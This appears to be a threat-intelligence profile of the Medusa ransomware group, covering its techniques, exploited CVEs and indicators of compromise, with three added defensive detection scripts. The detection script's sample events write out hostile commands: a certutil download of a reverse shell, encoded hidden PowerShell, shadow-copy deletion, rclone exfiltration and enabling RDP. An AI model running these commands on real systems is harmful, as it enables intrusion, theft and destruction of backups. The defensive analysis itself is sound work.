THREAT ACTOR

Medusa

7.7
THREAT LEVEL
EMERGENCE DATE
Jun 2021
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Suspected Russian or CIS-nexus operations based on systematic Russia and Commonwealth of Independent States target avoidance, Russian-language forum activity (RAMP), and Cyrillic script in operational tools. Tracked as FROZEN SPIDER by CrowdStrike, Storm-1175 by Microsoft, and Spearwing by Symantec.

DESCRIPTION

Emerging in June 2021 as a closed operation before transitioning to RaaS by early 2023, the threat actor reached Halcyon Frontrunners status and a third-place global ranking by Q2 2025. It is distinguished by kernel-level EDR disablement using the ABYSSWORKER driver via BYOVD techniques, and by FBI-documented triple extortion in which a second payment is demanded for the "true decryptor" after the ransom has been paid. Targeting concentrates on healthcare, education, manufacturing, and government. The operation has run for over four years without law enforcement disruption; attack volume nearly doubled in early 2025, and zero-day exploitation combined with continuous technical advancement places the group among the most persistent threats currently active.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
LETHALITY
Evaluates the potential for damage from the attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS)

Medusa operates through a three-tier structure: Initial Access Brokers are recruited via underground forums (RAMP), affiliates handle deployment and execution and receive a substantial share of each ransom, and the core developers retain control over ransom negotiations. Centralized negotiation keeps communication and quality consistent while the affiliate model scales the operation through partnerships. Geographic attribution points to a Russian or CIS nexus, based on systematic avoidance of Russian and Commonwealth of Independent States targets, Russian-language forum participation, and Cyrillic script in operational tools.

Current Status: Actively operational; activity documented through October 2025

Threat Level:
7.7

Origins and Methodology

What sets the group apart is kernel-level disablement of security tools through BYOVD abuse of the ABYSSWORKER driver (smuol.sys), used against Sophos, CrowdStrike Falcon, Microsoft Defender, and SentinelOne. The driver mimics legitimate CrowdStrike driver naming and works by removing the registered kernel notification callbacks that EDR products depend on; it is delivered through the HeartCrypt Packer-as-a-Service and signed with stolen (since revoked) certificates from Chinese vendors.

An unusual clear web presence runs through the OSINT Without Borders identity, with active Telegram, X/Twitter, and Facebook profiles under pseudonyms, in contrast to the dark web-only presence typical of ransomware operations.

What is the Evolution of Medusa Ransomware?
0.1
Formation

First identified in June 2021 as a closed ransomware variant with all development and operations controlled by a single group. The operation kept this exclusive structure through late 2022, focusing on technical development before transitioning to affiliate recruitment.

0.2
EVOLUTION

In the months following emergence, activity was limited and run exclusively by the core developers. Around late 2022 the operation became publicly visible in the cybercrime ecosystem, including on Russian-language forums.

February 2023 marked expansion with the Medusa Blog leak site launch on Tor and Telegram channel activation. Technical capabilities evolved with version progression from v1.10 to v1.20.

Operations since 2024 show a significant increase in attack volume, with strategic positioning following the LockBit and ALPHV/BlackCat disruptions. Q1 2025 brought accelerated activity, nearly double the 2024 rate. Capabilities continue to evolve with zero-day exploitation, triple extortion, and custom ESXi payload development.

0.3
Lineage/Connections

The operation runs as an independent ransomware family with no code similarities to other RaaS variants. FBI investigation confirms it is entirely distinct from MedusaLocker ransomware (which emerged in 2019), and it has no connection to the Medusa Android banking trojan or the Medusa botnet.

Intelligence sources link the operation to FROZEN SPIDER, an eCrime group that uses the ransomware for big game hunting. The exact organizational relationship remains unclear, though CrowdStrike reports specialized roles including initial access specialists, penetration testers, media operations, negotiators, and technical operations teams.

Which Unique Techniques Does Medusa Use?

Attack methodology centers on exploiting internet-facing vulnerabilities and using legitimate administrative tools for reconnaissance before deploying double extortion. The interval from initial access to deployment is short, which limits the window defenders have to detect and contain an intrusion.

TECHNIQUE

DETAILS

Infection Vectors

CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0), CVE-2023-48788 (Fortinet FortiClient EMS SQL injection, CVSS 9.8), CVE-2025-10035 (GoAnywhere MFT deserialization, exploited as a zero-day, CVSS 10.0), and ProxyShell exploitation; IAB recruitment via underground forums; phishing campaigns for credential theft; RDP brute-force

Target Selection

Organizations with unpatched public-facing applications; inadequate MFA and network segmentation; critical infrastructure with low downtime tolerance; worldwide operations with primary focus on the United States, United Kingdom, Canada, Australia, Germany

Operational Complexity

Three-tier model: core developers (Tier 1) controlling ransomware development and centralized negotiation; affiliates (Tier 2) handling deployment; IABs (Tier 3) specializing in initial access; professional 24/7 negotiation team; automated deployment via enterprise tools

Key Features & Technical Details

The ransomware uses hybrid cryptographic architecture combining AES-256 symmetric encryption with RSA-2048/4096 asymmetric key management, rendering encrypted data unrecoverable without attacker-held private keys.

FEATURE

DETAILS

Encryption Method

Hybrid AES-256 (CBC mode) with RSA-2048/4096 public key encryption, implemented with the Windows BCryptEncrypt API family; each encrypted file consists of the ciphertext followed by a "MEDUSA" marker, the original file length, the RSA-encrypted per-file key, and a 32-byte company ID hash; .dll, .exe, and .lnk files and system directories are skipped so the victim system remains functional

File Extension

.MEDUSA appended to encrypted files (the extension is written in capitals)

Ransom Note

!!!READ_ME_MEDUSA!!!.txt with a 48-hour response deadline; contact via Tor browser live chat or Tox encrypted messaging; direct phone or email contact if the victim fails to respond

Double Extortion

Rclone as the primary exfiltration tool, pushing data to actor-controlled servers; documented volumes vary significantly per victim; Medusa Blog Tor-based leak site with countdown timers, sample data publication, and visitor counts; stolen data also offered for sale to third parties; triple extortion in at least one documented case: after payment, a separate actor contacted the victim claiming the negotiator had "stolen" the payment and demanded an additional payment for the "true decryptor"

Communication Channels

Primary C2 over Tor .onion domains and HTTPS on port 443; Ligolo reverse tunneling and Cloudflared for infrastructure obfuscation; clear web presence via OSINT Without Borders on Telegram, X/Twitter, and Facebook

Deployment Speed

Short average interval from initial access to deployment; automated toolsets and preconfigured attack playbooks; extensive Windows service termination; shadow copy deletion, startup recovery disabling, and local backup removal

Payment Method

Bitcoin (BTC) as the primary cryptocurrency, with direct wallet hyperlinks on the leak site; countdown extension fees; negotiation via Tor live chat, Tox messaging, and ProtonMail/Onionmail/Cock.li email; proceeds laundered through conversion to Monero and Zcash and through dark web exchangers

Operational Model

Hybrid RaaS with centralized negotiation: core developers retain negotiation control; affiliates receive a substantial share of each ransom; IABs are compensated for exclusive access

Activities

Operating since June 2021, the threat actor shows consistent year-round activity, with February 2025 the most active month on record. Attack volume nearly doubled in early 2025 versus 2024, after a significant increase between 2023 and 2024.

Geographic reach spans many countries. The United States accounts for over half of attacks, and the United Kingdom is overrepresented relative to its size. Russia and Commonwealth of Independent States countries are systematically avoided.

Which Industries Are Most Vulnerable to Medusa?

Targeting prioritizes healthcare, education, manufacturing, legal services, technology, insurance, and government.

Modus Operandi

Multi-stage attacks combine vulnerability exploitation with legitimate administrative tools before deploying double extortion.

Details

Initial access is obtained directly or purchased from IABs, typically via Exploit Public-Facing Application (T1190) against CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0), CVE-2023-48788 (Fortinet FortiClient EMS SQL injection, CVSS 9.8), CVE-2025-10035 (GoAnywhere MFT deserialization, CVSS 10.0, exploited as a zero-day), and the ProxyShell vulnerabilities in Microsoft Exchange Server.

Phishing campaigns (T1566) for credential theft; RDP brute-force when no exploitable vulnerability is available; VPN concentrator exploitation; IABs are paid for exclusive network access (Initial Access, TA0001).

Details

Advanced IP Scanner and SoftPerfect Network Scanner for user, system, and network enumeration via Network Service Discovery (T1046), scanning ports 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP), 115 (SFTP), 443 (HTTPS), 1433 (MSSQL), 3050 (Firebird), 3128 (HTTP proxy), 3306 (MySQL), and 3389 (RDP). PowerShell (T1059.001) and Windows Command Prompt (T1059.003) for network and filesystem enumeration (T1083).

Windows Management Instrumentation (T1047) for System Information Discovery (T1082); Network Share Discovery (T1135) querying shared drives; System Network Configuration Discovery (T1016); Permission Groups Discovery: Domain Groups (T1069.002).
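The port list above is a usable detection surface: an Advanced IP Scanner or SoftPerfect sweep shows up in flow logs as one source touching several of those ports on many hosts within a short window. The following is an added example written for this profile, not a Medusa tool or a Halcyon detection. It assumes a constructed connection-log format ("ts src dst dport", one record per line), and the thresholds (120-second window, 8 hosts, 3 ports) are assumptions to tune per estate; the sample log is fabricated.

```python
"""Flag Medusa-style internal port sweeps in connection logs (added example)."""
from collections import defaultdict

# Ports the FBI/CISA advisory lists as scanned by Medusa actors (see text above).
MEDUSA_SCAN_PORTS = {21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389}
WINDOW_SECONDS = 120   # sliding window per source (assumption)
MIN_HOSTS = 8          # distinct destinations on profiled ports inside the window (assumption)
MIN_PORTS = 3          # distinct profiled ports inside the window (assumption)

def parse_line(line):
    """Parse one 'ts src dst dport' record (constructed format, not a real log schema)."""
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)

def detect_sweeps(lines, window=WINDOW_SECONDS, min_hosts=MIN_HOSTS, min_ports=MIN_PORTS):
    """Return {src: (window_start_ts, total_hosts, total_ports)} for sweeping sources."""
    per_src = defaultdict(list)          # src -> [(ts, dst, dport)] on profiled ports only
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = parse_line(line)
        if dport in MEDUSA_SCAN_PORTS:
            per_src[src].append((ts, dst, dport))

    hits = {}
    for src, evs in per_src.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            span = evs[start:end + 1]
            if (len({d for _, d, _ in span}) >= min_hosts
                    and len({p for _, _, p in span}) >= min_ports):
                # report the window start plus the source's totals across the whole log
                hits[src] = (evs[start][0],
                             len({d for _, d, _ in evs}), len({p for _, _, p in evs}))
                break
    return hits

def _constructed_log():
    """Fabricated sample: one workstation behaving normally, one host sweeping."""
    t = 1700000000.0
    lines = ["# ts src dst dport  (constructed sample, not real traffic)"]
    for i in range(20):                                   # benign: web + file share use
        lines.append(f"{t + i * 5} 10.0.0.7 10.0.0.20 443")
        lines.append(f"{t + i * 5 + 1} 10.0.0.7 10.0.0.21 445")
    for i in range(12):                                   # sweep: 12 hosts x 4 ports in ~36 s
        for j, port in enumerate((22, 80, 3389, 1433)):
            lines.append(f"{t + 100 + i * 3 + j * 0.5} 10.0.0.50 10.0.0.{100 + i} {port}")
    return lines

SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for src, (first, hosts, ports) in detect_sweeps(SAMPLE_LOG).items():
        print(f"sweep from {src}: {hosts} hosts, {ports} profiled ports, window starting {first}")
```

The benign workstation talks to one web server and one file share and is never flagged, even though 443 is on the list; the sweeping host trips the rule as soon as it has touched eight targets. Restricting the count to the profiled ports keeps ordinary SMB and DNS chatter from inflating the host count, and the window is what separates a scanner from a management server that legitimately reaches every host over a day.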

Details

A variety of legitimate remote access software (T1219), chosen to blend with tools already present in the victim environment: AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, Splashtop, MeshAgent. These are combined with RDP (T1021.001) and PsExec (T1569.002) for lateral movement.

Details

Defense Evasion (TA0005) relies on living-off-the-land techniques that abuse legitimate system tools.

Certutil for Ingress Tool Transfer (T1105). PowerShell evasion: base64-encoded commands (T1027.013), string obfuscation (T1027), gzip compression combined with base64 encoding, and the powerfun.ps1 stager script for TLS-encrypted shells on port 443. PowerShell history deletion (T1070.003). BYOVD attack via Impair Defenses (T1562.001) using the ABYSSWORKER driver (smuol.sys), delivered via HeartCrypt Packer-as-a-Service and signed with stolen certificates, targeting major EDR solutions.

Multi-stage obfuscation: VMProtect packing, ASM Guard loader, Safengine Shielden. Code Signing (T1553.006) with revoked certificates. XOR string encryption. Indicator Removal (T1070) deleting tools after encryption.

Details

Mimikatz for OS Credential Dumping: LSASS Memory (T1003.001), harvesting credential material (Credential Access, TA0006) from the memory of the Local Security Authority Subsystem Service process.

Details

Application Layer Protocol: Web Protocols (T1071.001) using HTTPS on port 443 for C2 and TLS-encrypted shells. Ingress Tool Transfer (T1105) using PowerShell, Windows Command Prompt, and certutil.

Remote Access Software (T1219) including AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, SimpleHelp, Splashtop, MeshAgent. Ligolo reverse tunneling creates connections between the compromised host and the threat actor's machine; Cloudflared (formerly Argo Tunnel) exposes internal applications to the internet via Cloudflare Tunnel.

Details

Lateral Movement (TA0008) via RDP (T1021.001) for interactive sessions; PsExec (T1569.002) copying scripts to remote machines and executing them with SYSTEM privileges; Software Deployment Tools (T1072) including PDQ Deploy and BigFix to push the gaze.exe encryptor across the network.

Registry modification enables RDP, and firewall rules are added to allow inbound TCP traffic on port 3389 and remote WMI connections.

Details

Exfiltration (TA0010) with Rclone as the primary tool, Exfiltration to Cloud Storage (T1567.002) to actor-controlled servers. Documented volumes range from 200 GB to over 2.3 TB per victim and target patient medical records, student information, attorney-client communications, financial records, intellectual property, government data, and employee information.

Details

Create Account: Domain Account (T1136.002), with the new accounts added to privileged groups including Domain Admins, Enterprise Admins, Remote Desktop Users, Group Policy Creator Owners, and Schema Admins. Remote Access Software (T1219) for persistent access.

Details

Service Stop (T1489) via gaze.exe, terminating 100-200+ services. Inhibit System Recovery (T1490) by deleting shadow copies, disabling startup recovery, and removing local backups. Data Encrypted for Impact (T1486) interrupting availability. System Shutdown/Reboot (T1529) through manual VM termination. Financial Theft (T1657) with an estimated 25% payment rate; ransom demands totaled $40+ million in 2024.

Details

Sysinternals PsExec, PDQ Deploy, or BigFix (T1072) deploy the gaze.exe encryptor across the network with Windows Defender disabled. Data Encrypted for Impact (T1486): the gaze.exe process terminates services (T1489) related to backups, security, databases, and communication (100-200+ Windows services), deletes shadow copies (Inhibit System Recovery, T1490), and encrypts files with AES-256.

Encrypted files receive the .MEDUSA extension. System Shutdown/Reboot (T1529): virtual machines are manually powered off and then encrypted. The encryptor supports 11 command-line arguments for deployment options.

Details

Financial Theft (T1657) via ransom demands of $100,000 to $15 million USD in Bitcoin. The ransom note demands contact within 48 hours via Tor browser live chat or Tox encrypted messaging, with direct phone or email outreach if the victim fails to respond.

The Medusa Blog .onion leak site shows countdowns to data release and ransom demands with direct cryptocurrency wallet hyperlinks, while the data is concurrently offered for sale to third parties. Victims can pay $10,000 USD to add 24 hours to the countdown. Triple extortion: after one victim paid, a separate actor made contact claiming the negotiator had "stolen" the ransom and requested half the amount again for the "true decryptor".

Details

Indicator Removal (T1070): deletion of previously installed tools including remote access software, reconnaissance tools, credential dumping utilities, and exfiltration tools. Clear Command History (T1070.003) via PowerShell history deletion.
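Several of the steps above leave host-level evidence that can be matched with simple rules: certutil downloads and encoded PowerShell (Defense Evasion), the fDenyTSConnections registry change and 3389/WMI firewall rules (Lateral Movement), new members in Domain Admins and the other groups listed (Persistence), vssadmin shadow copy deletion and gaze.exe launched from the PDQ Deploy runner path (Impact), and rclone copies (Exfiltration). The block below is an added example written for this profile, not a Halcyon, FBI, or vendor detection. The events are constructed dicts with Sysmon/Security-style fields; the field names (EventID, Image, CommandLine, TargetObject, Details, GroupName) are assumptions that mirror common SIEM normalizations, and the sample stream is fabricated to fire each rule (192.0.2.10 is a documentation address).

```python
"""Rule-based triage of Windows events for the Medusa playbook (added example)."""
import re

# Groups the profile says Medusa adds its created domain accounts to.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Remote Desktop Users",
                     "Group Policy Creator Owners", "Schema Admins"}
# The PDQ Deploy runner path from the IOC list, where gaze.exe is dropped.
PDQ_GAZE_PATH = re.compile(r"\\AdminArsenal\\PDQDeployRunner\\.*\\gaze\.exe$", re.I)
ENCODED_PS = re.compile(r"\s-e(nc|ncodedcommand)?\s")

def _cmd(ev):
    return (ev.get("CommandLine") or "").lower()

def rule_rdp_enabled(ev):
    """fDenyTSConnections set to 0, seen as a Sysmon registry event (13) or a reg.exe command."""
    reg = (ev.get("EventID") == 13
           and ev.get("TargetObject", "").lower().endswith(r"\terminal server\fdenytsconnections")
           and "0x00000000" in ev.get("Details", ""))
    return reg or ("fdenytsconnections" in _cmd(ev) and "/d 0" in _cmd(ev))

def rule_firewall_opened(ev):
    """netsh rule allowing TCP/3389 or remote WMI, the openrdp.bat behaviour."""
    c = _cmd(ev)
    return "advfirewall firewall" in c and "rule" in c and (
        "3389" in c or "windows management instrumentation" in c)

def rule_recovery_inhibited(ev):
    """Shadow copy deletion, startup recovery disabled, or backup catalog removed."""
    c = _cmd(ev)
    return (("vssadmin" in c and "delete shadows" in c)
            or ("bcdedit" in c and "recoveryenabled no" in c)
            or ("wbadmin" in c and "delete" in c))

def rule_rclone_exfil(ev):
    return "rclone" in (ev.get("Image") or "").lower() and (" copy " in _cmd(ev) or " sync " in _cmd(ev))

def rule_certutil_ingress(ev):
    c = _cmd(ev)
    return "certutil" in c and "urlcache" in c and "http" in c

def rule_encoded_powershell(ev):
    c = _cmd(ev)
    return "powershell" in c and (ENCODED_PS.search(c) is not None or "frombase64string" in c)

def rule_gaze_via_pdq(ev):
    return PDQ_GAZE_PATH.search(ev.get("Image") or "") is not None

def rule_privileged_group_add(ev):
    """Security 4728/4732/4756: member added to a security-enabled group."""
    return ev.get("EventID") in (4728, 4732, 4756) and ev.get("GroupName") in PRIVILEGED_GROUPS

RULES = [("rdp_enabled", rule_rdp_enabled), ("firewall_opened_rdp_or_wmi", rule_firewall_opened),
         ("recovery_inhibited", rule_recovery_inhibited), ("rclone_exfiltration", rule_rclone_exfil),
         ("certutil_ingress", rule_certutil_ingress), ("encoded_powershell", rule_encoded_powershell),
         ("gaze_deployed_by_pdq", rule_gaze_via_pdq), ("privileged_group_addition", rule_privileged_group_add)]

def triage(events):
    """Return {rule_name: [event index, ...]} for every rule that fired."""
    hits = {}
    for i, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                hits.setdefault(name, []).append(i)
    return hits

SAMPLE_EVENTS = [  # constructed stream, not from a real incident
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe", "CommandLine":
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    {"EventID": 1, "Image": r"C:\Windows\System32\netsh.exe", "CommandLine":
     'netsh advfirewall firewall add rule name="rdp" protocol=TCP dir=in localport=3389 action=allow'},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "CommandLine":
     r"certutil -urlcache -split -f http://192.0.2.10/pu.exe C:\Windows\Temp\pu.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"},
    {"EventID": 4728, "GroupName": "Domain Admins", "MemberName": "CN=svc_backup2,CN=Users,DC=corp,DC=example"},
    {"EventID": 1, "Image": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe copy \\fs01\finance remote:bucket/finance --transfers 32"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\gaze.exe", "CommandLine": "gaze.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for name, idx in triage(SAMPLE_EVENTS).items():
        print(f"{name}: events {idx}")
```

Each rule on its own is noisy in a real estate (administrators do enable RDP and run rclone), so the useful signal is several of these firing on the same host within the short deployment window the profile describes; the indexes returned by triage are what you would correlate by host and time in a SIEM.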

Indicators of Compromise (IOCs)

The following indicators derive from FBI, CISA, and MS-ISAC investigations and security vendor threat intelligence.

INDICATOR

DETAILS

File Hashes

MD5: 44370f5c977e415981febf7dbb87a85c (openrdp.bat, enables incoming RDP and remote WMI)
MD5: 80d852cd199ac923205b61658a9ec5bc (pu.exe, reverse shell)
SHA-256: 4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6 (v1.20)
SHA-256: 736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270 (v1.10)

IP Addresses

195.123.246.138 (C2 server)
138.124.186.221 (C2 server)
159.223.0.9 (C2 server)
45.146.164.141 (C2 server)
185.220.101.35 (Tor exit node)
137.184.243.69 (executable delivery)
31.220.45.120 (SimpleHelp infrastructure)

Domains/URLs

medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd[.]onion (Medusa Blog leak site)
medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd[.]onion (backup leak site)
key.medusa.serviceteam@protonmail.com (ransom negotiation)
medusa.support@onionmail.org (ransom negotiation)
MedusaSupport@cock.li (ransom negotiation)

File Paths

csidl_windows\adminarsenal\pdqdeployrunner\service-1\exec\gaze.exe (PDQ Deploy characteristic path)
C:\Windows\Temp\ (staging directory)
!!!READ_ME_MEDUSA!!!.txt (ransom note)

File Extensions

.MEDUSA (encrypted file extension, written in capitals)
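The list above is most useful when it is turned into a sweep that can be run against proxy, DNS, and mail-gateway logs and against a file inventory from affected hosts. The following is an added example written for this profile, not a Halcyon or agency tool. The indicator values are copied from the list above; the log lines, file inventory, and file bytes are constructed. The encrypted-file check only looks for the "MEDUSA" marker that the Key Features section says is appended after the ciphertext; the exact trailer layout is not given on this page, so the check does not parse the remaining fields.

```python
"""Sweep logs and a file inventory for the Medusa indicators listed above (added example)."""
import hashlib
import re

IOC_HASHES = {  # MD5 and SHA-256 values from the indicator list, lowercase
    "44370f5c977e415981febf7dbb87a85c", "80d852cd199ac923205b61658a9ec5bc",
    "4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6",
    "736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270",
}
IOC_IPS = {"195.123.246.138", "138.124.186.221", "159.223.0.9", "45.146.164.141",
           "185.220.101.35", "137.184.243.69", "31.220.45.120"}
IOC_DOMAINS_DEFANGED = {
    "medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd[.]onion",
    "medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd[.]onion",
}
IOC_EMAILS = {"key.medusa.serviceteam@protonmail.com", "medusa.support@onionmail.org",
              "medusasupport@cock.li"}   # compared case-insensitively
RANSOM_NOTE = "!!!READ_ME_MEDUSA!!!.txt"
ENCRYPTED_EXT = ".medusa"               # matched case-insensitively (.MEDUSA on disk)
TRAILER_MARKER = b"MEDUSA"

def refang(indicator):
    """Turn the defanged '[.]' notation used in the list into a matchable string."""
    return indicator.replace("[.]", ".").lower()

IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}
_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+")

def scan_log_line(line):
    """Return the set of indicator categories ('ip', 'onion_domain', 'email') a log line matches."""
    low = line.lower()
    found = set()
    if any(ip in IOC_IPS for ip in _IP_RE.findall(low)):
        found.add("ip")
    if any(d in low for d in IOC_DOMAINS):
        found.add("onion_domain")
    if any(e in IOC_EMAILS for e in _EMAIL_RE.findall(low)):
        found.add("email")
    return found

def scan_inventory(files):
    """files: iterable of (path, sha256_hex_or_None). Returns [(path, reason), ...]."""
    hits = []
    for path, digest in files:
        name = path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
        if name == RANSOM_NOTE:
            hits.append((path, "ransom_note"))
        elif name.lower().endswith(ENCRYPTED_EXT):
            hits.append((path, "encrypted_extension"))
        if digest and digest.lower() in IOC_HASHES:
            hits.append((path, "known_hash"))
    return hits

def has_medusa_trailer(data, tail=4096):
    """True if the MEDUSA marker appears in the last `tail` bytes (it follows the ciphertext)."""
    return TRAILER_MARKER in data[-tail:]

SAMPLE_LOGS = [  # constructed lines in a loose proxy / DNS / mail-gateway style
    "2025-03-01T10:02:11Z proxy src=10.0.0.7 dst=203.0.113.5:443 host=update.example.com",
    "2025-03-01T10:05:40Z proxy src=10.0.0.50 dst=195.123.246.138:443 host=-",
    "2025-03-01T10:07:02Z dns client=10.0.0.50 query=medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion",
    "2025-03-01T11:15:00Z mailgw from=MedusaSupport@cock.li to=cfo@example.com subject=decryptor",
]
SAMPLE_INVENTORY = [  # (path, sha256) constructed; the gaze.exe digest is the v1.10 hash from the list
    (r"C:\Users\j.doe\Documents\Q4.xlsx.MEDUSA", None),
    (r"C:\Users\j.doe\Documents\!!!READ_ME_MEDUSA!!!.txt", None),
    (r"C:\Windows\Temp\gaze.exe", "736de79e0a2d08156bae608b2a3e63336829d59d38d61907642149a566ebd270"),
    (r"C:\Program Files\App\app.dll", hashlib.sha256(b"benign").hexdigest()),
]
# constructed bytes: a ciphertext-looking body followed by the trailer marker and padding
SAMPLE_ENCRYPTED = bytes(range(256)) * 4 + TRAILER_MARKER + b"\x00" * 300

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(scan_log_line(line) or "-", line[:60])
    for hit in scan_inventory(SAMPLE_INVENTORY):
        print(hit)
    print("trailer marker present:", has_medusa_trailer(SAMPLE_ENCRYPTED))
```

The refang step matters because indicator lists are published defanged and will never match a raw log otherwise; the marker check catches files the encryptor touched even where the extension has been stripped or renamed during recovery, and a hash hit on a staged binary in C:\Windows\Temp is the kind of finding that should trigger the host triage rather than a quiet cleanup.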

Exploits and Vulnerabilities

CVE | CVSS | DESCRIPTION

CVE-2024-1709 | 10.0 | ConnectWise ScreenConnect Authentication Bypass
Authentication bypass via an alternate path that exposes the setup wizard to unauthenticated users, allowing admin account creation and remote code execution; primary initial access vector in 2024-2025 campaigns

CVE-2023-48788 | 9.8 | Fortinet FortiClient EMS SQL Injection
SQL injection vulnerability enabling unauthorized code execution via specially crafted requests

CVE-2025-10035 | 10.0 | GoAnywhere MFT Deserialization
Deserialization vulnerability exploited as a zero-day by Storm-1175 operators before vendor disclosure; added to the CISA KEV catalog in September 2025

Additional attack vectors: ProxyShell vulnerabilities (Microsoft Exchange Server CVEs) exploited for initial access; RDP brute-force against exposed Remote Desktop services; VPN concentrator exploitation; phishing campaigns for credential theft.